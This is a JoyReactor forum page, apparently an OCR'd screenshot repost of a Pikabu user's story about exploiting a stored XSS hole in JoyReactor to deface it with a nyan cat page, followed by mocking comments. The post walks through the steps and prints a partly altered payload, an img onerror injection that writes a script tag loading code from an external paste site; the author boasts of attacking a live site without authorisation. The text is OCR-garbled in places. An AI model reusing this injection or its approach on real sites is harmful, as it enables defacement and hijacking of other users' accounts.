А тем временем, пикабушники продолжают выебываться. / вообще похер :: минусуйте :: иди выёбывайся в свой двор :: Пикабу :: joyreactor

joyreactor Пикабу иди выёбывайся в свой двор минусуйте вообще похер песочница 
А тем временем, пикабушники продолжают выебываться.
^ , Привет, Пикабу! ^ , Вчера я опубликовал "супер-мега" историю о взломе популярной браузерной игры С&С. Но, пост не сыскал популярность, а все из-за того, что текст был написал слишком техническим языком, что как я понял, не есть хорошо. Поэтому, эту историю про взлом ^уКеасюг, я постарался
Подробнее
^ , Привет, Пикабу! ^ , Вчера я опубликовал "супер-мега" историю о взломе популярной браузерной игры С&С. Но, пост не сыскал популярность, а все из-за того, что текст был написал слишком техническим языком, что как я понял, не есть хорошо. Поэтому, эту историю про взлом ^уКеасюг, я постарался изложить как можно проще. Надеюсь, у меня это получилось. Jo/Rêâccor Чтобы было меньше вопросов: 1) Уязвимость - это такая штука, через которую можно сделать плохо кому-либо. Они бывают серверные и клиентские. Клиентские - это когда я делаю плохо ОДНОМУ, конкретному пользователю, на которого провожу атаку. Серверные уязвимости - это такие шняги, которые затрагивают всех и вся. 2) В случае JoyReactor уязвимость серверная - активная XSS. Это такая штука, которая позволяет выполнять JavaScript код на страницах сайта за пользователя. Кароч, если пользователь зашел на вредоносную страницу с XSS уязвимостью, то я могу, например, удалить его аккаунт или все фоточки, написать комментарий от его имени и все такое. В общем, а теперь сам экшен. Вон такая страница будет у пользователей JoyReactora: Пикабу лучше JoyReactor! АХАХХАХАХАХАХАХ Там еще музыка из nyan cat играет. л_л Вот так. Эту уязвимость я нашел еще 20 числа сего месяца, запостил к себе в twitter. Потом пытался найти email ящик, куда сообщить об оплошности, но не нашел... А как надо бороться с неотзывчивой администрацией?! Правильно! Надо постить nyan cat на всю страницу и добавить музыки :) Ну, а теперь, когда я рассказал, как все будет, давайте займемся делом! Сейчас на часах 1:10. 1. Заходим на JoyReactor.сс, и создаем новый пост с картинкой, у которой длина будет 830рх или больше. Нужно нам это, для того, чтобы занять всю ту белую область в ленте: 1 Комиксы )[ .иф.и )( красивые ««ртянкнЦ 9««К )[ «id«' )( »пт» )( Эроти.а )( «от» К «югу Ц шры ) Теги; Привет от пикабу. песочница. Это волшебная картинка. Просто наведи на нее курсор. Картинка: Выберите файл joyxss.png из URL Ifí ОПРОС редактор А теперь маленькое отступление. Прошло уже пол часа с 1:10, а написан всего один абзац и маленькая картинка. Знаете почему? Уязвимость то работает - то нет. Я не шучу... В общем, здесь у меня будет картинка - "Joy, не надо так." Mission Complete. Спустя двух бургеров, одной серии "Теории большого взрыва", я все таки со всем разобрался. Я все еще не понял как, но мать его, уязвимость работает. Я надеюсь, пост "в прямом эфире" не сильно вас раздражает, я пока только экспериментирую со стилем написания и отбиваю руку. :) А теперь, давайте пропустим, всю эту техническую чепуху, над которой я так долго парился, и сразу добавим вредоносный код на страницу JoyReactor. "><img src=x onerror="document.wnte('<scnpt src=https://paste.!ugons.org/raw/GpDXuQTVsuLhvjlY24i сохранить В целях безопасности, вектор атаки немного изменен, так как уязвимость еще не закрыта, а лига школьников не дремлет. P.S. Я надеюсь вам понравился мой пост, я очень старался. Я не стал предавать истории излишней глянцевости, как в голливудских фильмах про хакеров, где крутятся какие-то 3D кубики и пароли брутятся за 30 секунд. :) Надеюсь не зря. А мораль истории такова - Уважаемая администрация ресурсов, Вы имеете дело с огромной аудиторией -будьте отзывчивы и более кропотливо относитесь к безопасности своего детяща. Аминь. longpost.skv-dev.com
joyreactor,Пикабу,иди выёбывайся в свой двор,минусуйте,вообще похер,песочница
Еще на тему
Развернуть
ВОДА
всем с пикабу - хуем по лбу
А с двойными агентами как быть?
Какой то дебил писал, судя по тому бреду, что он называет уязвимостями, да и всему остальному. Чертовы школьники кулхацкеры
Ну xss вполне реально найти на джое. Недавно onclick и js с канвасом в ссылках поста работал. Кока потом добавил регулярку, но как мне кажется, она убивает не всё. Так что шансы найти дырку есть
Да неважно это все. Видно по тексту, что дегенерат, писавший эту ересь не обладает общими знаниями, а лишь какими то обрывками информации. Те люди, что занимаются этим профессионально видят всю картину целиком и обладают прежде всего огромной теоретической базой для поиска уязвимостей. А это - просто дебил школьник, который в кулхацеры заделаться хочет
Это все неважно
Я даже могу найти пост, в котором просил коку убрать js из постов и комментов, и который мог послужить причиной происков школоты
Но фраза "то работает, то не работает" - вообще пушка! XD
"тут помню - тут не помню" =)
Кулхацкер в деле
Остался всего лишь один вопрос - нахуй взламывать акк на реакторе?
Добавлю классики
Парень экспериментирует и отбивает руку, бедняжка тТ
Только зарегистрированные и активированные пользователи могут добавлять комментарии.
Похожие темы

Похожие посты
pttabu.ru